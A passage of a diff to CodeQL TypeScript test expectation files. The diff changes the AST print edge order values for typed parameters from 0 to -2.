tst.ts:89:21:89:21 | [Identifier] T | semmle.order | 1 | -| tst.ts:89:24:89:28 | [SimpleParameter] param | tst.ts:89:31:89:31 | [LocalTypeAccess] T | semmle.label | 0 | -| tst.ts:89:24:89:28 | [SimpleParameter] param | tst.ts:89:31:89:31 | [LocalTypeAccess] T | semmle.order | 0 | +| tst.ts:89:24:89:28 | [SimpleParameter] param | tst.ts:89:31:89:31 | [LocalTypeAccess] T | semmle.label | -2 | +| tst.ts:89:24:89:28 | [SimpleParameter] param | tst.ts:89:31:89:31 | [LocalTypeAccess] T | semmle.order | -2 | | tst.ts:90:1:90:39 | [DeclStmt] var constructorType1 = ... | tst.ts:90:5:90:38 | [VariableDeclarator] constru ... Object | semmle.label | 1 | | tst.ts:90:1:90:39 | [DeclStmt] var constructorType1 = ... | tst.ts:90:5:90:38 | [VariableDeclarator] constru ... Object | semmle.order | 1 | | tst.ts:90:5:90:38 | [VariableDeclarator] constru ... Object | tst.ts:90:5:90:20 | [VarDecl] constructorType1 | semmle.label | 1 | @@ -1874,8 +1874,8 @@ edges | tst.ts:91:23:91:51 | [FunctionExpr] new (pa ... Object | tst.ts:91:46:91:51 | [LocalTypeAccess] Object | semmle.order | 4 | | tst.ts:91:23:91:51 | [FunctionTypeExpr] new (pa ... Object | tst.ts:91:23:91:51 | [FunctionExpr] new (pa ... Object | semmle.label | 1 | | tst.ts:91:23:91:51 | [FunctionTypeExpr] new (pa ... Object | tst.ts:91:23:91:51 | [FunctionExpr] new (pa ... Object | semmle.order | 1 | -| tst.ts:91:28:91:32 | [SimpleParameter] param | tst.ts:91:35:91:40 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:91:28:91:32 | [SimpleParameter] param | tst.ts:91:35:91:40 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:91:28:91:32 | [SimpleParameter] param | tst.ts:91:35:91:40 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:91:28:91:32 | [SimpleParameter] param | tst.ts:91:35:91:40 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:92:1:92:50 | [DeclStmt] var constructorType3 = ... | tst.ts:92:5:92:49 | [VariableDeclarator] constru ... Object | semmle.label | 1 | | tst.ts:92:1:92:50 | [DeclStmt] var constructorType3 = ... | tst.ts:92:5:92:49 | [VariableDeclarator] constru ... Object | semmle.order | 1 | | tst.ts:92:5:92:49 | [VariableDeclarator] constru ... Object | tst.ts:92:5:92:20 | [VarDecl] constructorType3 | semmle.label | 1 | @@ -1892,8 +1892,8 @@ edges | tst.ts:92:23:92:49 | [FunctionTypeExpr] new ... Object | tst.ts:92:23:92:49 | [FunctionExpr] new ... Object | semmle.order | 1 | | tst.ts:92:28:92:28 | [TypeParameter] T | tst.ts:92:28:92:28 | [Identifier] T | semmle.label | 1 | | tst.ts:92:28:92:28 | [TypeParameter] T | tst.ts:92:28:92:28 | [Identifier] T | semmle.order | 1 | -| tst.ts:92:31:92:35 | [SimpleParameter] param | tst.ts:92:38:92:38 | [LocalTypeAccess] T | semmle.label | 0 | -| tst.ts:92:31:92:35 | [SimpleParameter] param | tst.ts:92:38:92:38 | [LocalTypeAccess] T | semmle.order | 0 | +| tst.ts:92:31:92:35 | [SimpleParameter] param | tst.ts:92:38:92:38 | [LocalTypeAccess] T | semmle.label | -2 | +| tst.ts:92:31:92:35 | [SimpleParameter] param | tst.ts:92:38:92:38 | [LocalTypeAccess] T | semmle.order | -2 | | tst.ts:94:1:94:37 | [FunctionDeclStmt] functio ... rn x; } | file://:0:0:0:0 | (Parameters) | semmle.label | 1 | | tst.ts:94:1:94:37 | [FunctionDeclStmt] functio ... rn x; } | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | | tst.ts:94:1:94:37 | [FunctionDeclStmt] functio ... rn x; } | file://:0:0:0:0 | (TypeParameters) | semmle.label | 2 | @@ -1906,8 +1906,8 @@ edges | tst.ts:94:1:94:37 | [FunctionDeclStmt] functio ... rn x; } | tst.ts:94:25:94:37 | [BlockStmt] { return x; } | semmle.order | 5 | | tst.ts:94:13:94:13 | [TypeParameter] S | tst.ts:94:13:94:13 | [Identifier] S | semmle.label | 1 | | tst.ts:94:13:94:13 | [TypeParameter] S | tst.ts:94:13:94:13 | [Identifier] S | semmle.order | 1 | -| tst.ts:94:16:94:16 | [SimpleParameter] x | tst.ts:94:19:94:19 | [LocalTypeAccess] S | semmle.label | 0 | -| tst.ts:94:16:94:16 | [SimpleParameter] x | tst.ts:94:19:94:19 | [LocalTypeAccess] S | semmle.order | 0 | +| tst.ts:94:16:94:16 | [SimpleParameter] x | tst.ts:94:19:94:19 | [LocalTypeAccess] S | semmle.label | -2 | +| tst.ts:94:16:94:16 | [SimpleParameter] x | tst.ts:94:19:94:19 | [LocalTypeAccess] S | semmle.order | -2 | | tst.ts:94:25:94:37 | [BlockStmt] { return x; } | tst.ts:94:27:94:35 | [ReturnStmt] return x; | semmle.label | 1 | | tst.ts:94:25:94:37 | [BlockStmt] { return x; } | tst.ts:94:27:94:35 | [ReturnStmt] return x; | semmle.order | 1 | | tst.ts:94:27:94:35 | [ReturnStmt] return x; | tst.ts:94:34:94:34 | [VarRef] x | semmle.label | 1 | @@ -1926,10 +1926,10 @@ edges | tst.ts:95:13:95:13 | [TypeParameter] S | tst.ts:95:13:95:13 | [Identifier] S | semmle.order | 1 | | tst.ts:95:15:95:15 | [TypeParameter] T | tst.ts:95:15:95:15 | [Identifier] T | semmle.label | 1 | | tst.ts:95:15:95:15 | [TypeParameter] T | tst.ts:95:15:95:15 | [Identifier] T | semmle.order | 1 | -| tst.ts:95:18:95:18 | [SimpleParameter] x | tst.ts:95:21:95:21 | [LocalTypeAccess] S | semmle.label | 0 | -| tst.ts:95:18:95:18 | [SimpleParameter] x | tst.ts:95:21:95:21 | [LocalTypeAccess] S | semmle.order | 0 | -| tst.ts:95:24:95:24 | [SimpleParameter] y | tst.ts:95:27:95:27 | [LocalTypeAccess] T | semmle.label | 0 | -| tst.ts:95:24:95:24 | [SimpleParameter] y | tst.ts:95:27:95:27 | [LocalTypeAccess] T | semmle.order | 0 | +| tst.ts:95:18:95:18 | [SimpleParameter] x | tst.ts:95:21:95:21 | [LocalTypeAccess] S | semmle.label | -2 | +| tst.ts:95:18:95:18 | [SimpleParameter] x | tst.ts:95:21:95:21 | [LocalTypeAccess] S | semmle.order | -2 | +| tst.ts:95:24:95:24 | [SimpleParameter] y | tst.ts:95:27:95:27 | [LocalTypeAccess] T | semmle.label | -2 | +| tst.ts:95:24:95:24 | [SimpleParameter] y | tst.ts:95:27:95:27 | [LocalTypeAccess] T | semmle.order | -2 | | tst.ts:95:31:95:35 | [TupleTypeExpr] [S,T] | tst.ts:95:32:95:32 | [LocalTypeAccess] S | semmle.label | 1 | | tst.ts:95:31:95:35 | [TupleTypeExpr] [S,T] | tst.ts:95:32:95:32 | [LocalTypeAccess] S | semmle.order | 1 | | tst.ts:95:31:95:35 | [TupleTypeExpr] [S,T] | tst.ts:95:34:95:34 | [LocalTypeAccess] T | semmle.label | 2 | @@ -1956,8 +1956,8 @@ edges | tst.ts:96:13:96:28 | [TypeParameter] S extends number | tst.ts:96:13:96:13 | [Identifier] S | semmle.order | 1 | | tst.ts:96:13:96:28 | [TypeParameter] S extends number | tst.ts:96:23:96:28 | [KeywordTypeExpr] number | semmle.label | 2 | | tst.ts:96:13:96:28 | [TypeParameter] S extends number | tst.ts:96:23:96:28 | [KeywordTypeExpr] number | semmle.order | 2 | -| tst.ts:96:31:96:31 | [SimpleParameter] x | tst.ts:96:34:96:34 | [LocalTypeAccess] S | semmle.label | 0 | -| tst.ts:96:31:96:31 | [SimpleParameter] x | tst.ts:96:34:96:34 | [LocalTypeAccess] S | semmle.order | 0 | +| tst.ts:96:31:96:31 | [SimpleParameter] x | tst.ts:96:34:96:34 | [LocalTypeAccess] S | semmle.label | -2 | +| tst.ts:96:31:96:31 | [SimpleParameter] x | tst.ts:96:34:96:34 | [LocalTypeAccess] S | semmle.order | -2 | | tst.ts:96:40:96:52 | [BlockStmt] { return x; } | tst.ts:96:42:96:50 | [ReturnStmt] return x; | semmle.label | 1 | | tst.ts:96:40:96:52 | [BlockStmt] { return x; } | tst.ts:96:42:96:50 | [ReturnStmt] return x; | semmle.order | 1 | | tst.ts:96:42:96:50 | [ReturnStmt] return x; | tst.ts:96:49:96:49 | [VarRef] x | semmle.label | 1 | @@ -2132,10 +2132,10 @@ edges | tst.ts:116:1:116:58 | [FunctionDeclStmt] functio ... ing) {} | tst.ts:116:29:116:32 | [KeywordTypeExpr] void | semmle.order | 3 | | tst.ts:116:1:116:58 | [FunctionDeclStmt] functio ... ing) {} | tst.ts:116:57:116:58 | [BlockStmt] {} | semmle.label | 5 | | tst.ts:116:1:116:58 | [FunctionDeclStmt] functio ... ing) {} | tst.ts:116:57:116:58 | [BlockStmt] {} | semmle.order | 5 | -| tst.ts:116:35:116:35 | [SimpleParameter] x | tst.ts:116:38:116:43 | [KeywordTypeExpr] number | semmle.label | 0 | -| tst.ts:116:35:116:35 | [SimpleParameter] x | tst.ts:116:38:116:43 | [KeywordTypeExpr] number | semmle.order | 0 | -| tst.ts:116:46:116:46 | [SimpleParameter] y | tst.ts:116:49:116:54 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:116:46:116:46 | [SimpleParameter] y | tst.ts:116:49:116:54 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:116:35:116:35 | [SimpleParameter] x | tst.ts:116:38:116:43 | [KeywordTypeExpr] number | semmle.label | -2 | +| tst.ts:116:35:116:35 | [SimpleParameter] x | tst.ts:116:38:116:43 | [KeywordTypeExpr] number | semmle.order | -2 | +| tst.ts:116:46:116:46 | [SimpleParameter] y | tst.ts:116:49:116:54 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:116:46:116:46 | [SimpleParameter] y | tst.ts:116:49:116:54 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:118:1:120:1 | [InterfaceDeclaration,TypeDefinition] interfa ... ram); } | tst.ts:118:11:118:32 | [Identifier] InterfaceWithThisParam | semmle.label | 1 | | tst.ts:118:1:120:1 | [InterfaceDeclaration,TypeDefinition] interfa ... ram); } | tst.ts:118:11:118:32 | [Identifier] InterfaceWithThisParam | semmle.order | 1 | | tst.ts:118:1:120:1 | [InterfaceDeclaration,TypeDefinition] interfa ... ram); } | tst.ts:119:3:119:45 | [MethodSignature] hasThis ... Param); | semmle.label | 2 | @@ -2326,10 +2326,10 @@ edges | tst.ts:142:1:146:1 | [FunctionDeclStmt] functio ... ) } } | tst.ts:142:48:142:64 | [PredicateTypeExpr] asserts condition | semmle.order | 4 | | tst.ts:142:1:146:1 | [FunctionDeclStmt] functio ... ) } } | tst.ts:142:66:146:1 | [BlockStmt] { if ... ) } } | semmle.label | 5 | | tst.ts:142:1:146:1 | [FunctionDeclStmt] functio ... ) } } | tst.ts:142:66:146:1 | [BlockStmt] { if ... ) } } | semmle.order | 5 | -| tst.ts:142:17:142:25 | [SimpleParameter] condition | tst.ts:142:28:142:30 | [KeywordTypeExpr] any | semmle.label | 0 | -| tst.ts:142:17:142:25 | [SimpleParameter] condition | tst.ts:142:28:142:30 | [KeywordTypeExpr] any | semmle.order | 0 | -| tst.ts:142:33:142:35 | [SimpleParameter] msg | tst.ts:142:39:142:44 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:142:33:142:35 | [SimpleParameter] msg | tst.ts:142:39:142:44 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:142:17:142:25 | [SimpleParameter] condition | tst.ts:142:28:142:30 | [KeywordTypeExpr] any | semmle.label | -2 | +| tst.ts:142:17:142:25 | [SimpleParameter] condition | tst.ts:142:28:142:30 | [KeywordTypeExpr] any | semmle.order | -2 | +| tst.ts:142:33:142:35 | [SimpleParameter] msg | tst.ts:142:39:142:44 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:142:33:142:35 | [SimpleParameter] msg | tst.ts:142:39:142:44 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:142:48:142:64 | [PredicateTypeExpr] asserts condition | tst.ts:142:56:142:64 | [LocalVarTypeAccess] condition | semmle.label | 1 | | tst.ts:142:48:142:64 | [PredicateTypeExpr] asserts condition | tst.ts:142:56:142:64 | [LocalVarTypeAccess] condition | semmle.order | 1 | | tst.ts:142:66:146:1 | [BlockStmt] { if ... ) } } | tst.ts:143:3:145:3 | [IfStmt] if (!co ... sg) } | semmle.label | 1 | @@ -2356,8 +2356,8 @@ edges | tst.ts:148:1:152:1 | [FunctionDeclStmt] functio ... ; } } | tst.ts:148:36:148:56 | [IsTypeExpr] asserts ... string | semmle.order | 4 | | tst.ts:148:1:152:1 | [FunctionDeclStmt] functio ... ; } } | tst.ts:148:58:152:1 | [BlockStmt] { if ... ; } } | semmle.label | 5 | | tst.ts:148:1:152:1 | [FunctionDeclStmt] functio ... ; } } | tst.ts:148:58:152:1 | [BlockStmt] { if ... ; } } | semmle.order | 5 | -| tst.ts:148:25:148:27 | [SimpleParameter] val | tst.ts:148:30:148:32 | [KeywordTypeExpr] any | semmle.label | 0 | -| tst.ts:148:25:148:27 | [SimpleParameter] val | tst.ts:148:30:148:32 | [KeywordTypeExpr] any | semmle.order | 0 | +| tst.ts:148:25:148:27 | [SimpleParameter] val | tst.ts:148:30:148:32 | [KeywordTypeExpr] any | semmle.label | -2 | +| tst.ts:148:25:148:27 | [SimpleParameter] val | tst.ts:148:30:148:32 | [KeywordTypeExpr] any | semmle.order | -2 | | tst.ts:148:36:148:56 | [IsTypeExpr] asserts ... string | tst.ts:148:44:148:46 | [LocalVarTypeAccess] val | semmle.label | 1 | | tst.ts:148:36:148:56 | [IsTypeExpr] asserts ... string | tst.ts:148:44:148:46 | [LocalVarTypeAccess] val | semmle.order | 1 | | tst.ts:148:36:148:56 | [IsTypeExpr] asserts ... string | tst.ts:148:51:148:56 | [KeywordTypeExpr] string | semmle.label | 2 | @@ -2396,8 +2396,8 @@ edges | tst.ts:157:15:157:29 | [TypeParameter] T extends any[] | tst.ts:157:25:157:29 | [ArrayTypeExpr] any[] | semmle.order | 2 | | tst.ts:157:25:157:29 | [ArrayTypeExpr] any[] | tst.ts:157:25:157:27 | [KeywordTypeExpr] any | semmle.label | 1 | | tst.ts:157:25:157:29 | [ArrayTypeExpr] any[] | tst.ts:157:25:157:27 | [KeywordTypeExpr] any | semmle.order | 1 | -| tst.ts:157:32:157:34 | [SimpleParameter] arr | tst.ts:157:37:157:56 | [ReadonlyTypeExpr] readonly [any, ...T] | semmle.label | 0 | -| tst.ts:157:32:157:34 | [SimpleParameter] arr | tst.ts:157:37:157:56 | [ReadonlyTypeExpr] readonly [any, ...T] | semmle.order | 0 | +| tst.ts:157:32:157:34 | [SimpleParameter] arr | tst.ts:157:37:157:56 | [ReadonlyTypeExpr] readonly [any, ...T] | semmle.label | -2 | +| tst.ts:157:32:157:34 | [SimpleParameter] arr | tst.ts:157:37:157:56 | [ReadonlyTypeExpr] readonly [any, ...T] | semmle.order | -2 | | tst.ts:157:37:157:56 | [ReadonlyTypeExpr] readonly [any, ...T] | tst.ts:157:46:157:56 | [TupleTypeExpr] [any, ...T] | semmle.label | 1 | | tst.ts:157:37:157:56 | [ReadonlyTypeExpr] readonly [any, ...T] | tst.ts:157:46:157:56 | [TupleTypeExpr] [any, ...T] | semmle.order | 1 | | tst.ts:157:46:157:56 | [TupleTypeExpr] [any, ...T] | tst.ts:157:47:157:49 | [KeywordTypeExpr] any | semmle.label | 1 | @@ -2448,10 +2448,10 @@ edges | tst.ts:164:32:164:44 | [TypeParameter] U extends Arr | tst.ts:164:32:164:32 | [Identifier] U | semmle.order | 1 | | tst.ts:164:32:164:44 | [TypeParameter] U extends Arr | tst.ts:164:42:164:44 | [LocalTypeAccess] Arr | semmle.label | 2 | | tst.ts:164:32:164:44 | [TypeParameter] U extends Arr | tst.ts:164:42:164:44 | [LocalTypeAccess] Arr | semmle.order | 2 | -| tst.ts:164:47:164:50 | [SimpleParameter] arr1 | tst.ts:164:53:164:53 | [LocalTypeAccess] T | semmle.label | 0 | -| tst.ts:164:47:164:50 | [SimpleParameter] arr1 | tst.ts:164:53:164:53 | [LocalTypeAccess] T | semmle.order | 0 | -| tst.ts:164:56:164:59 | [SimpleParameter] arr2 | tst.ts:164:62:164:62 | [LocalTypeAccess] U | semmle.label | 0 | -| tst.ts:164:56:164:59 | [SimpleParameter] arr2 | tst.ts:164:62:164:62 | [LocalTypeAccess] U | semmle.order | 0 | +| tst.ts:164:47:164:50 | [SimpleParameter] arr1 | tst.ts:164:53:164:53 | [LocalTypeAccess] T | semmle.label | -2 | +| tst.ts:164:47:164:50 | [SimpleParameter] arr1 | tst.ts:164:53:164:53 | [LocalTypeAccess] T | semmle.order | -2 | +| tst.ts:164:56:164:59 | [SimpleParameter] arr2 | tst.ts:164:62:164:62 | [LocalTypeAccess] U | semmle.label | -2 | +| tst.ts:164:56:164:59 | [SimpleParameter] arr2 | tst.ts:164:62:164:62 | [LocalTypeAccess] U | semmle.order | -2 | | tst.ts:164:66:164:77 | [TupleTypeExpr] [...T, ...U] | tst.ts:164:67:164:70 | [RestTypeExpr] ...T | semmle.label | 1 | | tst.ts:164:66:164:77 | [TupleTypeExpr] [...T, ...U] | tst.ts:164:67:164:70 | [RestTypeExpr] ...T | semmle.order | 1 | | tst.ts:164:66:164:77 | [TupleTypeExpr] [...T, ...U] | tst.ts:164:73:164:76 | [RestTypeExpr] ...U | semmle.label | 2 | @@ -2480,8 +2480,8 @@ edges | tst.ts:169:1:172:1 | [FunctionDeclStmt] functio ... + b; } | tst.ts:169:68:169:73 | [KeywordTypeExpr] number | semmle.order | 4 | | tst.ts:169:1:172:1 | [FunctionDeclStmt] functio ... + b; } | tst.ts:169:75:172:1 | [BlockStmt] { let ... + b; } | semmle.label | 5 | | tst.ts:169:1:172:1 | [FunctionDeclStmt] functio ... + b; } | tst.ts:169:75:172:1 | [BlockStmt] { let ... + b; } | semmle.order | 5 | -| tst.ts:169:31:169:31 | [SimpleParameter] x | tst.ts:169:34:169:64 | [TupleTypeExpr] [first: ... number] | semmle.label | 0 | -| tst.ts:169:31:169:31 | [SimpleParameter] x | tst.ts:169:34:169:64 | [TupleTypeExpr] [first: ... number] | semmle.order | 0 | +| tst.ts:169:31:169:31 | [SimpleParameter] x | tst.ts:169:34:169:64 | [TupleTypeExpr] [first: ... number] | semmle.label | -2 | +| tst.ts:169:31:169:31 | [SimpleParameter] x | tst.ts:169:34:169:64 | [TupleTypeExpr] [first: ... number] | semmle.order | -2 | | tst.ts:169:34:169:64 | [TupleTypeExpr] [first: ... number] | tst.ts:169:35:169:39 | [Identifier] first | semmle.label | 1 | | tst.ts:169:34:169:64 | [TupleTypeExpr] [first: ... number] | tst.ts:169:35:169:39 | [Identifier] first | semmle.order | 1 | | tst.ts:169:34:169:64 | [TupleTypeExpr] [first: ... number] | tst.ts:169:42:169:47 | [KeywordTypeExpr] number | semmle.label | 2 | @@ -2622,8 +2622,8 @@ edges | tst.ts:192:1:194:1 | [FunctionDeclStmt] functio ... rn x; } | tst.ts:192:47:192:70 | [TupleTypeExpr] [number ... number] | semmle.order | 4 | | tst.ts:192:1:194:1 | [FunctionDeclStmt] functio ... rn x; } | tst.ts:192:72:194:1 | [BlockStmt] { return x; } | semmle.label | 5 | | tst.ts:192:1:194:1 | [FunctionDeclStmt] functio ... rn x; } | tst.ts:192:72:194:1 | [BlockStmt] { return x; } | semmle.order | 5 | -| tst.ts:192:18:192:18 | [SimpleParameter] x | tst.ts:192:21:192:43 | [TupleTypeExpr] [first: ... number] | semmle.label | 0 | -| tst.ts:192:18:192:18 | [SimpleParameter] x | tst.ts:192:21:192:43 | [TupleTypeExpr] [first: ... number] | semmle.order | 0 | +| tst.ts:192:18:192:18 | [SimpleParameter] x | tst.ts:192:21:192:43 | [TupleTypeExpr] [first: ... number] | semmle.label | -2 | +| tst.ts:192:18:192:18 | [SimpleParameter] x | tst.ts:192:21:192:43 | [TupleTypeExpr] [first: ... number] | semmle.order | -2 | | tst.ts:192:21:192:43 | [TupleTypeExpr] [first: ... number] | tst.ts:192:22:192:26 | [Identifier] first | semmle.label | 1 | | tst.ts:192:21:192:43 | [TupleTypeExpr] [first: ... number] | tst.ts:192:22:192:26 | [Identifier] first | semmle.order | 1 | | tst.ts:192:21:192:43 | [TupleTypeExpr] [first: ... number] | tst.ts:192:29:192:34 | [KeywordTypeExpr] number | semmle.label | 2 | diff --git a/javascript/ql/test/library-tests/TypeScript/Types/printAst.expected b/javascript/ql/test/library-tests/TypeScript/Types/printAst.expected index 2d553ec5df3..e650e55fccf 100644 --- a/javascript/ql/test/library-tests/TypeScript/Types/printAst.expected +++ b/javascript/ql/test/library-tests/TypeScript/Types/printAst.expected @@ -2155,10 +2155,10 @@ edges | tst.ts:14:1:14:63 | [FunctionDeclStmt] functio ... + y; } | tst.ts:14:40:14:45 | [KeywordTypeExpr] string | semmle.order | 4 | | tst.ts:14:1:14:63 | [FunctionDeclStmt] functio ... + y; } | tst.ts:14:47:14:63 | [BlockStmt] { return x + y; } | semmle.label | 5 | | tst.ts:14:1:14:63 | [FunctionDeclStmt] functio ... + y; } | tst.ts:14:47:14:63 | [BlockStmt] { return x + y; } | semmle.order | 5 | -| tst.ts:14:17:14:17 | [SimpleParameter] x | tst.ts:14:20:14:25 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:14:17:14:17 | [SimpleParameter] x | tst.ts:14:20:14:25 | [KeywordTypeExpr] string | semmle.order | 0 | -| tst.ts:14:28:14:28 | [SimpleParameter] y | tst.ts:14:31:14:36 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:14:28:14:28 | [SimpleParameter] y | tst.ts:14:31:14:36 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:14:17:14:17 | [SimpleParameter] x | tst.ts:14:20:14:25 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:14:17:14:17 | [SimpleParameter] x | tst.ts:14:20:14:25 | [KeywordTypeExpr] string | semmle.order | -2 | +| tst.ts:14:28:14:28 | [SimpleParameter] y | tst.ts:14:31:14:36 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:14:28:14:28 | [SimpleParameter] y | tst.ts:14:31:14:36 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:14:47:14:63 | [BlockStmt] { return x + y; } | tst.ts:14:49:14:61 | [ReturnStmt] return x + y; | semmle.label | 1 | | tst.ts:14:47:14:63 | [BlockStmt] { return x + y; } | tst.ts:14:49:14:61 | [ReturnStmt] return x + y; | semmle.order | 1 | | tst.ts:14:49:14:61 | [ReturnStmt] return x + y; | tst.ts:14:56:14:60 | [BinaryExpr] x + y | semmle.label | 1 | @@ -2175,10 +2175,10 @@ edges | tst.ts:16:1:16:60 | [FunctionDeclStmt] functio ... + y; } | tst.ts:16:37:16:42 | [KeywordTypeExpr] number | semmle.order | 4 | | tst.ts:16:1:16:60 | [FunctionDeclStmt] functio ... + y; } | tst.ts:16:44:16:60 | [BlockStmt] { return x + y; } | semmle.label | 5 | | tst.ts:16:1:16:60 | [FunctionDeclStmt] functio ... + y; } | tst.ts:16:44:16:60 | [BlockStmt] { return x + y; } | semmle.order | 5 | -| tst.ts:16:14:16:14 | [SimpleParameter] x | tst.ts:16:17:16:22 | [KeywordTypeExpr] number | semmle.label | 0 | -| tst.ts:16:14:16:14 | [SimpleParameter] x | tst.ts:16:17:16:22 | [KeywordTypeExpr] number | semmle.order | 0 | -| tst.ts:16:25:16:25 | [SimpleParameter] y | tst.ts:16:28:16:33 | [KeywordTypeExpr] number | semmle.label | 0 | -| tst.ts:16:25:16:25 | [SimpleParameter] y | tst.ts:16:28:16:33 | [KeywordTypeExpr] number | semmle.order | 0 | +| tst.ts:16:14:16:14 | [SimpleParameter] x | tst.ts:16:17:16:22 | [KeywordTypeExpr] number | semmle.label | -2 | +| tst.ts:16:14:16:14 | [SimpleParameter] x | tst.ts:16:17:16:22 | [KeywordTypeExpr] number | semmle.order | -2 | +| tst.ts:16:25:16:25 | [SimpleParameter] y | tst.ts:16:28:16:33 | [KeywordTypeExpr] number | semmle.label | -2 | +| tst.ts:16:25:16:25 | [SimpleParameter] y | tst.ts:16:28:16:33 | [KeywordTypeExpr] number | semmle.order | -2 | | tst.ts:16:44:16:60 | [BlockStmt] { return x + y; } | tst.ts:16:46:16:58 | [ReturnStmt] return x + y; | semmle.label | 1 | | tst.ts:16:44:16:60 | [BlockStmt] { return x + y; } | tst.ts:16:46:16:58 | [ReturnStmt] return x + y; | semmle.order | 1 | | tst.ts:16:46:16:58 | [ReturnStmt] return x + y; | tst.ts:16:53:16:57 | [BinaryExpr] x + y | semmle.label | 1 | @@ -2207,8 +2207,8 @@ edges | tst.ts:20:1:20:53 | [FunctionDeclStmt] functio ... + y; } | tst.ts:20:10:20:21 | [VarDecl] partialTyped | semmle.order | 0 | | tst.ts:20:1:20:53 | [FunctionDeclStmt] functio ... + y; } | tst.ts:20:37:20:53 | [BlockStmt] { return x + y; } | semmle.label | 5 | | tst.ts:20:1:20:53 | [FunctionDeclStmt] functio ... + y; } | tst.ts:20:37:20:53 | [BlockStmt] { return x + y; } | semmle.order | 5 | -| tst.ts:20:26:20:26 | [SimpleParameter] y | tst.ts:20:29:20:34 | [KeywordTypeExpr] string | semmle.label | 0 | -| tst.ts:20:26:20:26 | [SimpleParameter] y | tst.ts:20:29:20:34 | [KeywordTypeExpr] string | semmle.order | 0 | +| tst.ts:20:26:20:26 | [SimpleParameter] y | tst.ts:20:29:20:34 | [KeywordTypeExpr] string | semmle.label | -2 | +| tst.ts:20:26:20:26 | [SimpleParameter] y | tst.ts:20:29:20:34 | [KeywordTypeExpr] string | semmle.order | -2 | | tst.ts:20:37:20:53 | [BlockStmt] { return x + y; } | tst.ts:20:39:20:51 | [ReturnStmt] return x + y; | semmle.label | 1 | | tst.ts:20:37:20:53 | [BlockStmt] { return x + y; } | tst.ts:20:39:20:51 | [ReturnStmt] return x + y; | semmle.order | 1 | | tst.ts:20:39:20:51 | [ReturnStmt] return x + y; | tst.ts:20:46:20:50 | [BinaryExpr] x + y | semmle.label | 1 | @@ -2573,8 +2573,8 @@ edges | tst.ts:75:5:75:47 | [SetterMethodSignature] set siz ... olean); | tst.ts:75:5:75:47 | [FunctionExpr] set siz ... olean); | semmle.order | 1 | | tst.ts:75:5:75:47 | [SetterMethodSignature] set siz ... olean); | tst.ts:75:9:75:12 | [Label] size | semmle.label | 2 | | tst.ts:75:5:75:47 | [SetterMethodSignature] set siz ... olean); | tst.ts:75:9:75:12 | [Label] size | semmle.order | 2 | -| tst.ts:75:14:75:18 | [SimpleParameter] value | tst.ts:75:21:75:45 | [UnionTypeExpr] number ... boolean | semmle.label | 0 | -| tst.ts:75:14:75:18 | [SimpleParameter] value | tst.ts:75:21:75:45 | [UnionTypeExpr] number ... boolean | semmle.order | 0 | +| tst.ts:75:14:75:18 | [SimpleParameter] value | tst.ts:75:21:75:45 | [UnionTypeExpr] number ... boolean | semmle.label | -2 | +| tst.ts:75:14:75:18 | [SimpleParameter] value | tst.ts:75:21:75:45 | [UnionTypeExpr] number ... boolean | semmle.order | -2 | | tst.ts:75:21:75:45 | [UnionTypeExpr] number ... boolean | tst.ts:75:21:75:26 | [KeywordTypeExpr] number | semmle.label | 1 | | tst.ts:75:21:75:45 | [UnionTypeExpr] number ... boolean | tst.ts:75:21:75:26 | [KeywordTypeExpr] number | semmle.order | 1 | | tst.ts:75:21:75:45 | [UnionTypeExpr] number ... boolean | tst.ts:75:30:75:35 | [KeywordTypeExpr] string | semmle.label | 2 | @@ -2629,8 +2629,8 @@ edges | tst.ts:85:5:87:5 | [FunctionExpr] set siz ... ; } | file://:0:0:0:0 | (Parameters) | semmle.order | 1 | | tst.ts:85:5:87:5 | [FunctionExpr] set siz ... ; } | tst.ts:85:48:87:5 | [BlockStmt] { ... ; } | semmle.label | 5 | | tst.ts:85:5:87:5 | [FunctionExpr] set siz ... ; } | tst.ts:85:48:87:5 | [BlockStmt] { ... ; } | semmle.order | 5 | -| tst.ts:85:14:85:18 | [SimpleParameter] value | tst.ts:85:21:85:45 | [UnionTypeExpr] string ... boolean | semmle.label | 0 | -| tst.ts:85:14:85:18 | [SimpleParameter] value | tst.ts:85:21:85:45 | [UnionTypeExpr] string ... boolean | semmle.order | 0 | +| tst.ts:85:14:85:18 | [SimpleParameter] value | tst.ts:85:21:85:45 | [UnionTypeExpr] string ... boolean | semmle.label | -2 | +| tst.ts:85:14:85:18 | [SimpleParameter] value | tst.ts:85:21:85:45 | [UnionTypeExpr] string ... boolean | semmle.order | -2 | | tst.ts:85:21:85:45 | [UnionTypeExpr] string ... boolean | tst.ts:85:21:85:26 | [KeywordTypeExpr] string | semmle.label | 1 | | tst.ts:85:21:85:45 | [UnionTypeExpr] string ... boolean | tst.ts:85:21:85:26 | [KeywordTypeExpr] string | semmle.order | 1 | | tst.ts:85:21:85:45 | [UnionTypeExpr] string ... boolean | tst.ts:85:30:85:35 | [KeywordTypeExpr] number | semmle.label | 2 | @@ -2733,8 +2733,8 @@ edges | tst.ts:104:3:107:3 | [FunctionDeclStmt] functio ... }`; } | tst.ts:104:28:104:44 | [TemplateLiteralTypeExpr] `hello ${string}` | semmle.order | 4 | | tst.ts:104:3:107:3 | [FunctionDeclStmt] functio ... }`; } | tst.ts:104:46:107:3 | [BlockStmt] { / ... }`; } | semmle.label | 5 | | tst.ts:104:3:107:3 | [FunctionDeclStmt] functio ... }`; } | tst.ts:104:46:107:3 | [BlockStmt] { / ... }`; } | semmle.order | 5 | -| 